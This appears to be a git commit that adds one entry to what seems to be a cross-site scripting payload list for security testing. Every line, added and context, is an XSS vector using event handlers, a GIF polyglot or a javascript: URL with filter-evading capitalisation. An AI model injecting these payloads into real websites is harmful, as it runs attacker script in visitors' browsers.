Added entry from #964

This commit is contained in:
Mo Langning 2024-02-14 06:00:37 +00:00
parent 802ec0e9ff
commit 9c8ce30b42
2 changed files with 3 additions and 1 deletions

View file

@ -111,3 +111,4 @@ GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
<form onsubmit=alert(1)><input type=submit> <form onsubmit=alert(1)><input type=submit>
<select onchange=alert(1)><option>1<option>2 <select onchange=alert(1)><option>1<option>2
<menu id=x contextmenu=x onshow=alert(1)>right click me! <menu id=x contextmenu=x onshow=alert(1)>right click me!
<Img Src=javascript:alert(1) OnError=location=src>

Before

Width:  |  Height:  |  Size: 4 KiB

After

Width:  |  Height:  |  Size: 4.1 KiB

View file

@ -110,4 +110,5 @@ GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
<keygen autofocus onfocus=alert(1)> <keygen autofocus onfocus=alert(1)>
<form onsubmit=alert(1)><input type=submit> <form onsubmit=alert(1)><input type=submit>
<select onchange=alert(1)><option>1<option>2 <select onchange=alert(1)><option>1<option>2
<menu id=x contextmenu=x onshow=alert(1)>right click me! <menu id=x contextmenu=x onshow=alert(1)>right click me!
<Img Src=javascript:alert(1) OnError=location=src>

Before

Width:  |  Height:  |  Size: 4 KiB

After

Width:  |  Height:  |  Size: 4.1 KiB